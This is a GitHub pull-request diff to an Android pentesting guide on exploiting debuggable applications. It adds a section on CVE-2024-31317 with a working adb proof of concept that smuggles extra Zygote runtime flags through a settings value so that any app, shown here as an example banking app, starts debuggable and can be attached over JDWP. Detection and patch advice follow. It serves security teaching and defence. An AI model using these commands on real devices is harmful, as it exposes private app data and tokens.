Skip to content

Research Update Enhanced src/mobile-pentesting/android-app-p... #1183

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 1 commit into from
Jul 28, 2025
Merged

Research Update Enhanced src/mobile-pentesting/android-app-p... #1183

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
45 changes: 40 additions & 5 deletions ...obile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -15,7 +15,7 @@ Content based on https://medium.com/@shubhamsonani/hacking-with-precision-bypass
1. **Decompile the APK:**

- Utilize the APK-GUI tool for decompiling the APK.
- In the _android-manifest_ file, insert `android:debuggable=true` to enable debugging mode.
- In the _android-manifest_ file, insert `android:debuggable="true"` to enable debugging mode.
- Recompile, sign, and zipalign the modified application.

2. **Install the Modified Application:**
Expand All @@ -30,7 +30,7 @@ Content based on https://medium.com/@shubhamsonani/hacking-with-precision-bypass

- Command: `adb shell am setup-debug-app –w <package_name>`.
- **Note:** This command must be run each time before starting the application to ensure it waits for the debugger.
- For persistence, use `adb shell am setup-debug-app –w -–persistent <package_name>`.
- For persistence, use `adb shell am setup-debug-app –w –persistent <package_name>`.
- To remove all flags, use `adb shell am clear-debug-app <package_name>`.

5. **Prepare for Debugging in Android Studio:**
Expand Down Expand Up @@ -83,12 +83,47 @@ A demonstration was provided using a vulnerable application containing a button

This example demonstrated how the behavior of a debuggable application can be manipulated, highlighting the potential for more complex exploits like gaining shell access on the device in the application's context.

---

# 2024 – Turning **any** application into a debuggable process (CVE-2024-31317)

Even if the target APK is _not_ shipped with the `android:debuggable` flag, recent research showed that it is possible to force **arbitrary applications** to start with the `DEBUG_ENABLE_JDWP` runtime flag by abusing the way Zygote parses command-line arguments.

* **Vulnerability:** Improper validation of `--runtime-flags` supplied through Zygote’s command socket allows an attacker that can reach `system_server` (for example via the privileged `adb` shell which owns the `WRITE_SECURE_SETTINGS` permission) to inject extra parameters. When the crafted command is replayed by `system_server`, the victim app is forked as _debuggable_ and with a JDWP thread listening. The issue is tracked as **CVE-2024-31317** and was fixed in the June 2024 Android Security Bulletin.
* **Impact:** Full read/write access to the private data directory of **any** app (including privileged ones such as `com.android.settings`), token theft, MDM bypass, and in many cases a direct path to privilege-escalation by abusing exported IPC endpoints of the now-debuggable process.
* **Affected versions:** Android 9 through 14 prior to the June 2024 patch level.

## Quick PoC

```bash
# Requires: adb shell (device must be <2024-06-01 patch-level)
# 1. Inject a fake API-denylist exemption that carries the malicious Zygote flag
adb shell settings put global hidden_api_blacklist_exemptions "--runtime-flags=0x104|Lcom/example/Fake;->entryPoint:"

# 2. Launch the target app – it will be forked with DEBUG_ENABLE_JDWP
adb shell monkey -p com.victim.bank 1

# 3. Enumerate JDWP PIDs and attach with jdb / Android-Studio
adb jdwp # obtain the PID
adb forward tcp:8700 jdwp:<pid>
jdb -connect com.sun.jdi.SocketAttach:hostname=localhost,port=8700
```

> The crafted value in step 1 breaks the parser out of the “fast-path” and appends a second synthetic command where `--runtime-flags=0x104` (`DEBUG_ENABLE_JDWP | DEBUG_JNI_DEBUGGABLE`) is accepted as if it had been supplied by the framework. Once the app is spawned, a JDWP socket is opened and regular dynamic-debug tricks (method replacement, variable patching, live Frida injection, etc.) are possible **without modifying the APK or the device boot image**.

## Detection & Mitigation

* Patch to **2024-06-01** (or later) security level – Google hardened `ZygoteCommandBuffer` so that subsequent commands cannot be smuggled in this way.
* Restrict `WRITE_SECURE_SETTINGS` / `shell` access on production devices. The exploit requires this permission, which is normally only held by ADB or OEM-privileged apps.
* On EMM/MDM-managed fleets, enforce `ro.debuggable=0` and deny shell via `adb disable-verifier`.

---

## References

- [https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0](https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0)
- [https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications](https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications)
- [https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html](https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html)
- [https://blog.flanker017.me/cve-2024-31317/](https://blog.flanker017.me/cve-2024-31317/)

{{#include ../../banners/hacktricks-training.md}}